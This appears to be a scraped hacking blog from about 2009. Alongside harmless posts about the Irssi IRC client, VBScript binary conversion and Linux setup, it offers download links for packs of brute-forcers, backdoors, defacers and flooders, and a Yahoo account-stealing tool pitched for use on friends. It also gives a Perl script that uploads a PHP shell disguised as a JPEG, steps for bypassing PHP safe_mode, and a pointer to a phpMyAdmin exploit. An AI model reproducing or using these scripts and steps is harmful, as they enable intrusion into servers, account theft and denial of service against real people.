Irssi a Terminal Based IRC Client for UNIX Systems

Irssi is a terminal based IRC client for UNIX systems.
Irssi a Terminal Based IRC Client for Unix Systems
Features:
Autologging
Irssi will automatically log any channels, queries or special windows that you want. The logfiles will be separated per IRC network, and even log rotation is supported. Log file formats, themes and destination directories can be easily configured with the Irssi log settings.

Formats and themes
Theming is a popular item in todays desktop enviroments, it's an easy yet powerful way to customize your Irssi client's look and feel. Irssi's formatting is modular which means you can just change the appearance of the objects and all items contaning that object will change into that format.

Configurable keybindings
This feature is a piece of art, it allows you to modify the default keybindings and create your own so you can customize your client. If these keybindings are tuned, you can switch through the windows in no time, execute commands and even complete objects with these bindings.

Paste detection
If you have ever pasted a bunchload of text into a wrong channel, you know how hard the consequences can be. Irssi tries to detect when you are pasting large amounts of text, by looking at the speed that characters are entered; if such pasting is detected [TAB]-characters are sent as-is instead of being tab-completed and eventually ending up in a wrong destination window. When Irssi detects such a pasting, you will get the option to either abort the paste or execute the paste, this way you have total control of the pasting.

Perl scripting
Perl is one of the most used programming languages around the globe and integrating Perl into applications means flexible and powerful scripting capabilities. The entire behavior and appearence of Irssi can be modified within these Perl scripts. Irssi provides a script archive with many contributed Irssi scripts which provide both useful extra features and the required assistance to make your own scripts.

Irssi-proxy
This is much more than just a bouncer, Irssi-proxy is a plugin which allows to bind a port to each IRC server you are connected to. This means that instead of having to remember to identify with a password, you can just connect to the Irssi-proxy with a server password. The copy of Irssi running the proxy works just as a normal client which you can use, but you can also connect one or more clients to it to share the connections. Using Irssi as a proxy has the major advantage of Irssi's power as an IRC client. You never have to worry about losing your connection to IRC. Even if you don't want to use Issi as a client, I can strongly recommend it as a proxy because you can just connect to it with any IRC client by just connecting to the specified port instead of SSH-ing to the machine that your Irssi is running on.

Upgrades
Upgrading your Irssi client to the latest version can be easily done without losing the connections to the IRC servers and without restarting Irssi. You can use the UPGRADE command to load the new Irssi binary and restoring your connections.

How to Install Irssi:
for debian based distributions you have only to type this in a terminal
sudo apt-get install irssi

for other distributions download irssi from here:
http://www.irssi.org/download open a terminal and type irssi
and execute the irc commands
example:
/connect irc.ubuntu.com
/join #ubuntu

you can download irssi themes from http://www.irssi.org/themes, download and put the selected theme to the .irssi directory in your home folder.
then execute this command in irssi
/SET theme themename.theme

Screenshot of Irssi:

Perl Hacking Tools

1. GMail brute
2. BtTel Telnet BruteForce
3. BruteMSN
4. BruteFTP brftp by m0x.lk
5. PHP-Shells finder
6. VNC Vuln Scanner
7. JoMo-Kun Parallel NMAP Scanner
8. DMZScan - Simple Connect Port Scanner using PERL
9. R-Trojan Scanner 1.0
10. Database extractor
11. Nepokatneza GUI Edition 1.6
12. Directory spider
13. B0ffuzzer v1.0
14. PRIVACY_SPYER / DR. GREENTHUMB
15. Milw0rm New Exploits Checker
16. FTP scanner by softxor
17. PHP Injection Scanner
18. SatanBot
19. MassDefacer
20. Email Extractor
21. Crypt This Shit
22. netBRUTE
23. Email grabber
24. MD5 Lookup
25. Google dorkizzler
26. Simple phpBB version checker
27. Simple IRC Bot.
28. PHP injection scanner
29. A utility to parse the BIOS PCI IRQ Routing Table
30. MSSQL Record Dumper 0.1.1 Alpha
31. Stealth ShellBot Vers?o 0.2
32. Web Clickers
33. Windows / Linux mass defacer script
34. LogCleaner (beta)
35. All In One Exploit
36. MD5 Bruteforce
37. Site Lister
38. Simple mail grabber
39. ARP dos, makes the target windows pc unusable for the duration of the attack
40. DNS Scanner
41. Creates a wordlist for brute forcing.
42. Decrypt DES with a wordlist
43. Denial of Service script
44. Leech imageshack images
45. MD5 cracker uses wordlist
46. Checks http server given site is running
47. Very small port scanner
48. Enumerates directorys / users on a webserver.
49. Simple Shellcode Generator
50. TCP/UDP Flooder
51. BR00TALL - Password Hash Brute-Forcer
52. Proxy Scanner
53. ConnectBackShell
54. Skype Bruteforcer
55. Force & fast check ports
56. bluetooth hacking tool
57. SQL insertion crawler
58. binary scanner
59. POP3 Crack (bruteforce)
60. openpgp vanity key generator
61. MD5 Hash Bruteforce Kit
62. Brute force for Oracle databases.
63. MD5 cracker irc-bot
64. Freewebs Shout box flooder
65. Distributed reflection denial of service program
66. shellcode generator
67. General RFI Scanner
68. MD5 Hash matcher
69. Perl ebay login
7o. Bind Port
71. Another Irc-bot
72. Scanner for eNdonesia 8.4 Multiple Vulner
73. gQuery Script (Command-Line Google Query Script)
74. simple milw0rm rss news graber
75. Google Search Tool
76. HTTP-GET Request Generator
77. Random Password Generator
78. Flexible Random Password Generation
79. AIM grabs a users online status
80. Simple Webserver Scanner
81. Botsniffer
82. Reverse IP script.
83. Cpanel Brute forcer
84. Extracts and cracks hashes of a given MySQL dump of a vBulletin board
85. VulnScan v9
86. IRC Spam bot
87. Simple IP 2 Hex script
88. perl proxy list checker
89. PerlBot
90. A simple irc bot
91. Perl direct SOCKS server's list checker
92. Perl/Tk TCP Port Scanner
93. simple irc bot for the remote control of Windows based systems
94. Script uses smbclient to fetch files from win null shares.
95. A simple proxy checker
96. Perl Connect Back Backdoor
97. log eraser MSRLE v0.1
98. CPanel exploit checker
99. Scan a host for rfi vulnz
100. Banner Grabber(mass hosts)
101. cold fusion/ws_ftp.ini password decryption/encryption
102. ConnectBack Backdoor Shell vs 1.0
103. Dictionary Maker
104. CGI scanner
105. connect and send commands to remote ip:port. the tor network is used for anonymity.
106. port scanner sweeper.
107. rfi scaner. Includes ddb grabber, rfi expl0iter, error_reporting(0) bypass.
108. Log all IP's of visiors
109. Directory revealer
110. IIS Scanner 2002
111. UDP Flooder
112. MD5 Cracker
113. MD5::Reverse
114. wordlist tool by mousepad



download here

http://rapidshare.com/files/222887516/Perl_scripts.rar


this can make your inspirate to use perl language for scripting

Content-Type jpeg upload in shell (c99)

how to upload if permission in shell not give an access...

make this


save this with uploader_bypass.pl
#!/usr/bin/perl

use LWP;
use HTTP::Request::Common;

$ua = $ua = LWP::UserAgent->new;; # UserAgent is an HTTP client

$res = $ua->request(POST 'http://alamat.situs/upload.php', # send POST request
Content_Type => 'form-data', # The content type is
# multipart/form-data the standard for form-based file uploads
Content => [
userfile => ["shell.jpeg", "shell.php", "Content-Type" => "image/jpeg"], # The body of the
# request will contain the shell.php file
],
);
print $res->as_string();


that script have to save in 1 directory in shell
and run your perl script

nice to try......

Convert a binary data (BinaryRead) to a string by VBS

There are at least two ways you can convert binary data (for example data from BinaryRead method) to a string.
1. Use VBS MultiByte functions :

Function SimpleBinaryToString(Binary)
'SimpleBinaryToString converts binary data (VT_UI1 | VT_ARRAY Or MultiByte string)
'to a string (BSTR) using MultiByte VBS functions
Dim I, S
For I = 1 To LenB(Binary)
S = S & Chr(AscB(MidB(Binary, I, 1)))
Next
SimpleBinaryToString = S
End Function


SimpleBinaryToString is clear function, but the function takes much time for large data. You can use it to convert data with up to 100kB of size (concatenation of large string takes much processor time). You can use similar function with better performance :

Function BinaryToString(Binary)
'Antonin Foller, http://www.motobit.com
'Optimized version of a simple BinaryToString algorithm.

Dim cl1, cl2, cl3, pl1, pl2, pl3
Dim L
cl1 = 1
cl2 = 1
cl3 = 1
L = LenB(Binary)

Do While cl1<=L
pl3 = pl3 & Chr(AscB(MidB(Binary,cl1,1)))
cl1 = cl1 + 1
cl3 = cl3 + 1
If cl3>300 Then
pl2 = pl2 & pl3
pl3 = ""
cl3 = 1
cl2 = cl2 + 1
If cl2>200 Then
pl1 = pl1 & pl2
pl2 = ""
cl2 = 1
End If
End If
Loop
BinaryToString = pl1 & pl2 & pl3
End Function

This function is up to 20 times faster than SimpleBinaryToString. You can use it to convert up to 2 MB of binary data.
2. Use ADODB.Recordset :
ADODB.Recordset lets you work with all supported VARIANT data types - also with binary and String data (VT_UI1 | VT_ARRAY, BSTR). It lets you convert between these two data formats :

Function RSBinaryToString(xBinary)
'Antonin Foller, http://www.motobit.com
'RSBinaryToString converts binary data (VT_UI1 | VT_ARRAY Or MultiByte string)
'to a string (BSTR) using ADO recordset

Dim Binary
'MultiByte data must be converted To VT_UI1 | VT_ARRAY first.
If vartype(xBinary)=8 Then Binary = MultiByteToBinary(xBinary) Else Binary = xBinary

Dim RS, LBinary
Const adLongVarChar = 201
Set RS = CreateObject("ADODB.Recordset")
LBinary = LenB(Binary)

If LBinary>0 Then
RS.Fields.Append "mBinary", adLongVarChar, LBinary
RS.Open
RS.AddNew
RS("mBinary").AppendChunk Binary
RS.Update
RSBinaryToString = RS("mBinary")
Else
RSBinaryToString = ""
End If
End Function

RSBinaryToString is not limitted by time - only by physical memory. The function is up to 100 times faster than MultiByte conversions - you can use it to convert up to 100MB data.
The function lets you also convert MultiByte strings to String. Next function converts MultiByte string to binary data :

Function MultiByteToBinary(MultiByte)
'© 2000 Antonin Foller, http://www.motobit.com
' MultiByteToBinary converts multibyte string To real binary data (VT_UI1 | VT_ARRAY)
' Using recordset
Dim RS, LMultiByte, Binary
Const adLongVarBinary = 205
Set RS = CreateObject("ADODB.Recordset")
LMultiByte = LenB(MultiByte)
If LMultiByte>0 Then
RS.Fields.Append "mBinary", adLongVarBinary, LMultiByte
RS.Open
RS.AddNew
RS("mBinary").AppendChunk MultiByte & ChrB(0)
RS.Update
Binary = RS("mBinary").GetChunk(LMultiByte)
End If
MultiByteToBinary = Binary
End Function

3. Use ADODB.Stream :
ADODB.Stream lets you work with String and binary data type. It lets you also convert between these two data formats :

'Stream_BinaryToString Function
'2003 Antonin Foller, http://www.motobit.com
'Binary - VT_UI1 | VT_ARRAY data To convert To a string
'CharSet - charset of the source binary data - default is "us-ascii"
Function Stream_BinaryToString(Binary, CharSet)
Const adTypeText = 2
Const adTypeBinary = 1

'Create Stream object
Dim BinaryStream 'As New Stream
Set BinaryStream = CreateObject("ADODB.Stream")

'Specify stream type - we want To save text/string data.
BinaryStream.Type = adTypeBinary

'Open the stream And write text/string data To the object
BinaryStream.Open
BinaryStream.Write Binary


'Change stream type To binary
BinaryStream.Position = 0
BinaryStream.Type = adTypeText

'Specify charset For the source text (unicode) data.
If Len(CharSet) > 0 Then
BinaryStream.CharSet = CharSet
Else
BinaryStream.CharSet = "us-ascii"
End If

'Open the stream And get binary data from the object
Stream_BinaryToString = BinaryStream.ReadText
End Function

To save/retrieve binary data from a disk, binary file upload and download in ASP or better work with binary data

5NMP - SNMP scanner/bruteforcer

Background:
SNMP is the Simple Network Management Protocol. It is used by many if not most companies to manage and monitor their infrastructure. It is also often overlooked in terms of security and underestimated as an attack vector.
RFC1157.

Components:
The program is a GUI program, written in c#, so you'll need the .NET framework (3.5) and it will only work in MS Windows (Mono and Windows GUI components are a pain to make compatible for now).

It uses 2 DLL's that were written from scratch: the hacking.snmp and hacking.bruteforce.dll. These components were written from scratch. The SNMP dll is not complete yet but whenever the author finds time it will be extended to support bulkget and extended ASN parsing, so enumeration will become possible as well as SET actions. You will also need to provide a dictionary for dictionary attacks. A very small one is included.

Generic usage:
The interface should be intuitive enough.
Use the slider to increase or decrease scanning speed. This is important to get accurate results. On a LAN the slider can be set to maximum speed. Behind a Natted broadband connection, caution is advised.
Devices such as ADSL modems aren't capable to deal with the large amount of packets and nat connections they generate. The program uses non-blocking udp sockets and a listener for answers, which makes it quite fast.
You can also set the destination port for devices which listen on non-standard ports (not 161) and set the listening port to make sure the packets get back ok in case of firewalls.

For optimal speed, turn off verbosity, errors and reverse lookups (only in case of maximum speed on a LAN).
Results can be saved in XML for further processing and loaded back.

Support && Bugs:
There probably are bugs. Just report them to my email address which can be found on this site.

Download: 5NMP.tar.gz
MD5: codito.de/remote-exploit-md5/5nmp.txt
Author: Filip Waeytens


SCREENSHOT:



reference:remote-exploit.org

Backtrack 4 Pre Final Rilis

you wanna get that.....come to this link:

backtack_4

Recovery Root Password

follow this to recovery root password:


boot with the live_cd (accidental use ubuntu)
mkdir / d
mount / dev/hda1 / d
chroot / d
passwd (or passwd root)
write a new password ago Ctrl + Alt + Delete



may this very help us for recover from hardness,hehehehe

setting linux for speedy[special for indonesia]

how to setting speedy connection in your linux setting, please follow this tips:

1. open System> Administration> Network
2. after the exit autentification alias enter the unlock
3. double click on "Wired Connection"
>> Select configuration "Local Zeroconf network (IPv4 LL)". select OK after that.
4. ago double click on "Point to point connection"
>> Select Connection Type PPPoE and enter the user & pass it. and select OK to return to the Network Settings menu.
5. ensure that the "Wired Connection" & "Point to point connection" dicontreng (which means connected marks).
6. speedy connected ..


u can try it at home.......

Shell scripting tutorial


hello in world many program with scripting, like python,perl,php n other....now, i will give you a Shell scripting what is a shell scripting is "Shell Script is series of command written in plain text file. Shell script is just like batch file is MS-DOS but have more power than the MS-DOS batch file.", i take from my reference....

if you wanna learn and interest with that language...

goto here

http://www.freeos.com/guides/lsst/


u will be found a something wonderfull in it

reference:google

Hacking Flash Games (PART 1)

Hacking Flash Games

In this article I will show you how to hack and cheat flash games, like getting unlimited ammo or unlimited health etc… For this article I made a custom application that you can download and use freely to achieve this, but there are some steps you should do before. Well let’s start. I would recommend that you use Firefox for the first operation but it’s up to you, I will cover both Firefox and Internet Explorer, but for the beginner Pc user the Internet Explorer method might sound difficult. Anyways it’s up to you.

So these are the steps for the first operation for Firefox users, Internet Explorer users scroll down until you find the Internet Explorer instructions.
If you don’t have Firefox then download it from Firefox web browser | Faster, more secure, & customizable and install it. You will need FlashGet, a very powerful Download Manager, download it from http://www.flashget.com/en/download.htm, and install it. Now open Firefox and install a plug-in called ‘FlashGot’, download it from FlashGot - Best Firefox Download Manager Integration - what is it? - InformAction and restart Firefox. Now go to the website that has the flash game you want to hack, in my case I’m going to use wpnFire shooting Flash Game and if you installed FlashGet and FlashGot right click on the page (not on the flash game) and you should see this menu :




And select ‘FlashGot All’. Now you will see the following dialog



This image has been resized. Click this bar to view the full image. The original image is sized 548x372.


Find the .swf files and try and select the game, we don’t need the others, just the swf file of the game. And press Ok, select where you want to save it and then FlashGet should download it. So the first operation is done for Firefox users. You are ready for the second operation.

Now I will explain how to download the game for Internet Explorer Users.
Go to the website where the flash game you want to hack is I will use wpnFire shooting Flash Game, and let the flash game load completely! Now go on view/source menu and Notepad should come up, now go on Edit/Find and type in .swf and press ‘Find Next’ until you find on like ‘gamename.swf’ it is trial and error. Now when you think that you have found it close the Notepad and go on Tools/Internet Options, now on the General tab press Settings and click on View Files, now sort the files according to the File Type and scroll until you find ‘Shockwave Flash Object’ and find the file with the name of the game, copy and paste it where you want in this case it is ‘wpnfire1final.swf’ and close Internet Explorer and everything. Now you are ready for the second operation.

If It did help please don't forget to add +rep to my post, Thanks

Read The Second Part Here:
Hacking Flash Games (PART 2)
Attached Files
File Type: zip TheComputerMaster Flash Game HacKer.zip

reference: TcM@codecall

scared with ip banned

actually, im so lazy, couse my ip has been suspend or banned by milw0rm with my friend, he make script n i cant open milw0rm site with him script....

if u wanna know n try that script plis open here in your url

http://www.milw0rm.com/admin/mywisdom/soceng.php


http://www.milw0rm.com/admin/.wisdom.php?is=mywisdom


what happened if we use that url...????

we cannot opened or anything in milw0rm.....but not permanently, just 3 or 7 days

but you dont scared there is a tool can make u access taht site again..

ninjacloak is proxy tool online, u can use that if wanna opened or access it....

try it if you want..

ninja cloak site:

http://www.ninjacloak.com/


thanks for my friends@jasakom n all member forum i ve joined

Yahoo! hacking tools


hallo there.....wanna steal account yahoo from your friend or other ucan use this tools may be this very usefull to you

please come here for download:


http://rapidshare.com/files/79345834/Y__Jacked.rar.html

http://rapidshare.com/files/131658601/Y__Jacked.rar

http://www.4shared.com/file/56691994/c0411bfd/Y__Jacked_2__2_.html


just wanna share this tools, if u can download from this url u can comment here n i will search again n give u massage.... :)

Bypassing PHP Safe_Mode

hey....come back again with me....now, i wanna share how to bypass PHP safe_mode = on be safe_mode = off

follow this step friends:
first we need to what is our id if it subexec

we can write php.ini and then type in it safe_mode= off

then upload it and refresh the browser

opps u see that safe mod is off

okey but some servers will ignore the php.ini that u upload it

and then u can'y Bypass safe mode with php.ini

cuz server's root make directed and specific path to php.ini

we can bypass it via .htaccess file

we will write line in .htaccess that will make another path to php.ini so

we will Bypass safe mode look at the line we will put in.htaccess

but we can bypass it via .htccess file

CODE
suPHP_ConfigPath /home/user/public_html/php.ini


change path with the path that u upload php.ini in it

now it's nice upload php.ini with htaccess file in any dir


u will see safe mode off

may this very usefull for someone wanna change safe_mode be off
thanks for myfriend @ r00tsecurity:GoneGirl

Kaspersky Anti-Virus Update 06-15-2009

This is the latest virus definitions for Kaspersky Anti-Virus Personal and Lite.15.06.2009

Download:

Rapidshare Generator



Rapidshare Premium Generator is very easy for you, just click "Generate" and you have your very own Rapidshare Premium Account.
You can download Rs Generator here:

Code:
http://www.sendspace.com/file/h49tod
http://rapidshare.com/files/229908444/RapidShare_Generator.rar


reference:dnsstuff@hacker-community

Bots collection

hey all my friend in world,hehehhe, i just wanna say you all when u read my article in my blog....
whos man wanna play bots, and certainly its so hard to get a bot source....now you can download here

http://rapidshare.com

this very nice, 150 bots in 1......

nice to use it....

reference:jamesbondbest@hacker-community n the 0wn3r

FTP searc engine

this for searching FTP in site...

http://search.ftphost.net/indexer/search.htm

h
ttp://ftp.sh.cvut.cz/WEB/

http://www.narlytime.com/

http://www.mmnt.ru/int/



e.g:
*.pdf C programming

About CVE-2009-1151

During an evaluation of tools for internal use, we took a look at phpMyAdmin. During the assessment, we identified that the scripts/setup.php script is used to generate a configuration file to config/config.inc.php. Anytime PHP code is being generated, extremely careful filtering must be done to ensure that the intended output cannot be escaped and will not allow the injection of arbitrary code.

While the most obvious inputs, those set by the configuration fields, were escaped properly, other attacker accessible data was not. The script passes PHP serialized data back and forth through the configuration parameter. When a save action is performed, this data is then written as PHP variables to the configuration file. The data contains associative arrays with key and value pairs. On output, the values are properly escaped using add_slashes, however the keys that are also output are not filtered. By modifying the array keys in the serialized data passed to a save POST request, the key name can be escaped and arbitrary PHP code injected. If config/ is writable by the web server user, the config.inc.php file is written to it and can be executed directly out of the document root.

The issue was disclosed to the phpMyAdmin team and they did an amazing job responding to this disclosure with a patch out in less than 24 hours!

Lessons learned? Anytime you are programmatically generating code (be it HTML, JavaScript, PHP, etc.) ensure that your output is properly filtered and make sure all installation scripts and unneeded administration tools are removed.


you can use that bug with a tool from milw0rm.
this exploits:
http://milw0rm.com/exploits/8921
you can save into sh extention..

reference:
http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php

http://labs.neohapsis.com/2009/04/06/about-cve-2009-1151/

Google Trick

may be this old trick in google engine for searching...
i will show step by step to do a trick:
1. open google
2. choose search for image
3.copy this code:
javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200;DI=document.images; DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style;DIS.position='absolute'; DIS.left=Math.sin (R*x1+i*x2+x3)*x4+x5;DIS.top=Math.cos(R* y1+i*y2+y3 )*y4+y5}R++}setInterval('A()',5); void(0);
4. paste into address bar....
5. nice try :p

list of all the Best Hacking Tools

thanks for my friends in the hacker-community.uk.to....u wanna share there n make all member be proud join there...hehehhe

i wanna share this in common public in order make its usefull, not for attackin'...

This list of the best hacking tools for serious hacking...

sqlmap 0.6.1
sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user?s specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.

XSS-Proxy - Cross Site Scripting Attack Tool
XSS-Proxy is an advanced Cross-Site-Scripting (XSS) attack tool. The documents, tools and other content on this site assume you have a basic understanding of XSS issues and existing exploitation methods. If you are not famliar with XSS, then I recommend you check out the primer links/docs below to get a better of idea of what XSS is and how to detect it, fix it, and exploit it.

lm2ntcrack - Microsoft Windows NT Hash Cracker (MD4 -LM) This tool is for instantly cracking the Microsoft Windows NT Hash (MD4) when the LM Password is already known, you might be familiar with LM Cracking tools such as LCP.

The main problem is you?ve got the LM password, but it?s in UPPERCASE because LM hashes are not case sensitive, so you need to find the actual password for the account.

Web-Harvest - Web Data Extraction Tool
Web-Harvest is Open Source Web Data Extraction tool written in Java. It offers a way to collect desired Web pages and extract useful data from them. In order to do that, it leverages well established techniques and technologies for text/xml manipulation such as XSLT, XQuery and Regular Expressions.

NetStumbler - Windows Freeware to Detects Insecure Wireless Networks
It?s a favourite amongst Windows users, although it can?t do any real hacking (like breaking a WEP key) - it?s extremely fast and effecient in the detection of open WAPs.

Superscan v4.0 - Fast TCP & UDP Port Scanner for Windows
SuperScan 4 is an update of the highly popular Windows port scanning tool, SuperScan.

Windows XP Service Pack 2 has removed raw sockets support which now limits SuperScan and many other network scanning tools. Some functionality can be restored by running the following at the Windows command prompt before starting SuperScan

dnsscan - DNS Open Recursive Resolver Scanner/Scanning Tool
Dnsscan is a tool for finger printing open recursive resolvers. It runs in conjuction with a small server that knows how to reply to queries forwarded from probed resolvers.

Surf Jack - Cookie Session Stealing Tool
A tool which allows one to hijack HTTP connections to steal cookies - even ones on HTTPS sites! Works on both Wifi (monitor mode) and Ethernet.

XTest - VoIP Infrastructure Security Testing Tool
XTest is a simple, practical, and free, wired 802.1x supplicant security tool implementing the RFC 3847 EAP-MD5 Authentication method. It can be used to assess the password strength within wired ethernet environments that rely on 802.1x to protect IP Phones and the VoIP Infrastructure against rogue PC access.

PuttyHijack V1.0 - Hijack SSH/PuTTY Connections on Windows
PuttyHijack is a POC tool that injects a dll into the PuTTY process to hijack an existing, or soon to be created, connection.

PAW/PAWS - Python Advanced Wardialing System
PAW / PAWS is a wardialing software in python. It is designed to scan for ISDN (PAWS only) and ?modern? analog modems (running at 9.6kbit/s or higher). Wardialing tools are - despite their martialic naming - used to find nonauthorized modems so one can disable those and as result make access to the internal network harder.

Wireshark v1.0.0
Wireshark is the world?s foremost network protocol analyzer, and is the de facto (and often de jure) standard across many industries and educational institutions.

Goolag - GUI Tool for Google Hacking
cDc (Cult of the Dead Cow) recently released a GUI driven tool for Google Hacking called Goolag.

Kismet
- Wireless Network Hacking, Sniffing & Monitoring
Kismet is one of foundation tools Wireless Hacking, it?s very mature and does what it?s supposed to do.

Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic

fEvicol v1.0
fEvicol v1.0 is a simple executable(exe)+JPEG image(jpg) binder. The icon of the binded executable is configurable, Lauches both the executable and picture when lauched. Check ReadMe.txt for more details.

MSN Password Finder v2.0 for Win XP/2003
MSN Password Finder v2.0 for Windows XP & 2003, reveals the stored[saved] MSN Messenger Password on the computer. This new version is compatible with the new-method of storing passwords. Tested on WinXP SP2 with MSN Messenger 7.0

Password Revealer For Internet Explorer
Password Revealer for Internet Explorer reveals whats behind the asterisks (***) in a web-page. Can be used to viewing password that has just been typed in password-field (see Screensot). Requires Microsoft .NET Runtime.

peck v1.0
peck v1.0 is PE [Portable Executable] Signature Scanner - Detects Packers / Cryptors / Compilers etc..

Password-Revealer
Password Revealer ( less than 5KB in size ) is a useful utiltity that reveals the password stored behind the asterisks (?****?) in ordinary password fields. Works in Windows 9x,2000,XP,2003

TinyWebCamViewer
Tiny Web Cam Viewer (2.26KB in size), is a pocket sized utility that you can use to view through your webcam.

MSN Password Finder v1.0
Finds the MSN Messenger Password stored on your computer. Works only in cases where the current-user has chosen to remember the pass in MSN Messenger. Works with MSN Messenger 6.x, 7.x .. Tested on Win2K, WinXP. Njoi!!

SixthSense [RC2]
SixthSense RC2 [Release Candidate 2] Has Now IP Address revealing function. It exploits a flaw found in MSN Messenger 6.0 or lower, or Windows Messenger to get the IP Address. [Use a Sniffer and find out what the program is doing ;), don't mail me asking for it ]

IceCold ReLoaded
IceCold ReLoaded has the same functionality IceCold, but has been updated with the new msn protocol. IceCold ReLoaded is capable of locking or freezing an MSN Passport Account (@hotmail.com, @msn.com etc..). This person won?t be able to access his/her hotmail account, sign into msn messenger etc.. is IceCold ReLoaded is launched on his/her account. The person can resume the normal activities as soon as IceCold ReLoaded is stopped.

Due to the unethical nature of this program, I would advice the users to use the program wisely.

IceCold (Obsolete)
IceCold can be used to Freeze an MSN Passport Account. Can disallow a person from accessing his hotmail mailbox, msn messenger etc.. Please use IceCold ReLoaded for the purpose.. this version has been posted here only for historical purposes.

FUn WIth MSN v1.0
Add fake plugins/application names to your MSN Messenger to have some fun with your MSN Buddies?

CusExt
CusExt is a simple program to associate an extension with a program.

Avril
Avril is a simple multi-threaded bulk mailer. Highly Buggy S/W!!

Avril Source Code - zip file is password protected.. break it (its really easy. and have the source code.. don?t mail me asking for the password.)

Kutty
The World?s Smallest PE [Portable Executable]. Its only 513 bytes in size!! Tested in Win98SE & WinXP..

Chota
Chota Add-On -by- da_neural
The World?s Smallest Keylogger!! Its only 724 bytes!! It logs the keys to C:.SYS. Please read Info.txt ( in chota.zip ) for more information on this tiny keylogger! :)

BIOS Password Remover
The program tries to remove the bios password. It seems to work only in AWARD bios and a few older older bios. Please read the ReadMe.txt before using the program.. Author takes no responsibility for any damage caused by the use of this program!! Works in Win9x/ME ONLY!!!

MSN Password Decryptor v2.0 (Obsolete)
Decrypts the encrypted password stored in the registry. Works only in cases where you?ve chosen to remember the pass in MSN Messenger. (Now. Works with newer MSN version.. tested it on Win98SE only!!)

RoBis v1.0
RoBis is a simple anonymous mailer with a special feature that you needn?t specify an SMTP Server to send a mail. RoBis queries the DNS server for mail exchange server of the receipient?s e-mail address and sends it..

It works on most servers.. i tested it on yahoo, hotmail, rediffmail, gmx, vsnl, sify and eth accounts.. :D

Hanuman Server
Hanuman Server is a simple daemon that runs on port 3333 (0xD05) which give a DOS Shell to anyone who connects to that port..

PortScan
PortScan is a simple port scanner that scans about 28 know ports under port no. 127.. it may fail in slow internet connections :(

Gorgons
[ Boring Saturday Evening Product ]
It just kills the foreground window, in case it has any of the keywords specified in Gorgons.txt ( editable ). It doesn?t install itself, so, you?ll have to put a short cut in startup folder or modify the registry. It can be used to kill pop-up ads, porno sites etc..

KillSSKC
KillSSKC is an uninstaller for SSKC v1.x, v2.0. It searches in process list to locate the SSKC by name and if located deletes the EXE and the DLL.

PEncrypt v4.0?
Nice few improvement from the previous version. Catches few more Application level debuggers, Tracers etc.. Beats detection by AVP (most of the times)

SSKC v2.0 (BugFixed)
SSKC v2.0 ( Super Stealth Key Capturer) is a keylogger with SMTP support. It can kill AntiVirus and FireWalls and similar applications. It comes with a config utility TweakSSKC. Have FUN!!! ( thanx toma iulica for reporting the bug )

ELFCrypt v1.0
A small update to v0.666. Download Source!

AntiCrypt
A Generic OEP (Original Entry Point) Seeker? read README.TXT for more details!

CHTML
CHTML - Crypted Hyper Text Markup Language? A utility that CRYPTS normal HTML pages so that its source remains senseless to a casual _code stealer_

UE
Unkracable Encryption - Create Self Extractable Encryped Files

DeRAR
Extract Your RAR Archives Quickly - Very Fast Unarchiver

OrDidI
SMTP Client - Send Your Mail Anonymously - Very Fast, Robust ?

FAT32Exp
Explorer Program similar to Norton Commander,.. Browse thru folder, open files, execute ?em and more..

VBscrypt
Visual Basic Script Encrypting Tool. Decryptors are polymorphic with random variables of variable length.

Valhalla
Valhalla ?the unlimited digits? Calculator. It has some functions like GCD, Prime Checking, Perfect Square Checking etc..

Patch Maker
Its a small yet efficient patch maker.. which i have christened it as ?A Silly Patch Maker?. Please read Instruction before using it.


thnks:Th3_0wn3r, jack_king n all member in hacker-community.uk.to

GFI LANguard


The

#

1 Network Security Scanner and Vulner

ability Management Solution

GFI LANguard™ is the award-winning network and security scanner used by over 20,000 customers. GFI LANguard scans your network and ports to detect, assess and correct security vulnerabilities with minimal administrative effort. As an administrator, you have to deal separately with problems related to vulnerability issues, patch management and network auditing, at times

u

sing multiple products. However, with GFI LANguard these three cornerstones of vulnerability management are addressed in one package. We give you a complete picture of your network set-up and help you to maintain a secure network state faster and more effectively.

Freeware Version Available

To add further value, GFI has now released a freeware version of GFI LANguard, in line with our ‘We Care’ initiative to offer a helping hand in these hard economic times. Using the freeware version, companies can scan up to five IPs for free using the product’s full feature set – with no restric

tions whatsoever. Click here for more information.

Vulnerability Management

GFI LANguard perf

orms network scans using vulnerability check databases based on OVAL and SANS Top 20, providing over 15,00

0 vulnerability assessments when your network, including any virtual environment, is scanned. GFI LANguard allows you to analyze the state of your network security and take action before it is compromised. The latest version detects machines that are vulnerable to infection by the Conficker worm as well as identifying machines that have been infected.

Patch Management

When a network scan is complete, GFI LANguard’s Patch Management gives you what you need to effectively deploy and manage patches on all machines across different Microsoft operating systems and products in 38 languages. Not only can you automatically download missing Microsoft security updates, but you can also automatically deploy the missing Microsoft patches or service-packs throughout your network at the end of scheduled scans.

Network Auditing

GFI LANguard’s Network Auditing tells you all you need to know about your network by retrieving hardware information on memory, processors, display adapters, storage devices, motherboard details, printers, and ports in use. Using baseline comparisons you can check whether any hardware was added or removed since the last scan. GFI LANguard will identify and report unauthorized software installations and provide alerts or even automatically uninstall unauthorized applications.

Why use GFI LANguard?

  • Powerful network, security and port scanner with network auditing capabilities
  • Over 15,000 vulnerability assessments carried out across your network, including virtual environment
  • Reduces the total cost of ownership by centralizing vulnerability scanning, Patch Management and Network Auditing
  • Automated options help to retain a secure network state with minimal administrative effort
  • Network-wide auditing functions provides a complete picture of network and port security set-up
  • #1 Windows commercial security scanner (voted by Nmap users for two years running) and Best of TechEd 2007 (security)

New WINDOWS virus (worm: W32/Bugbear-B)

This is more a worm, not a virus.
It is a windows based, and is used like most of the viruses -in email
It can even leave an open door to hackers, so that makes it a litle like a trojan.
Very dangerous. It comes in email attachments with extensions like .exe, .scr and .pif.
You can recognise it by this subjects:

Hello!
update
Payment notices
Just a reminder
Correction of errors
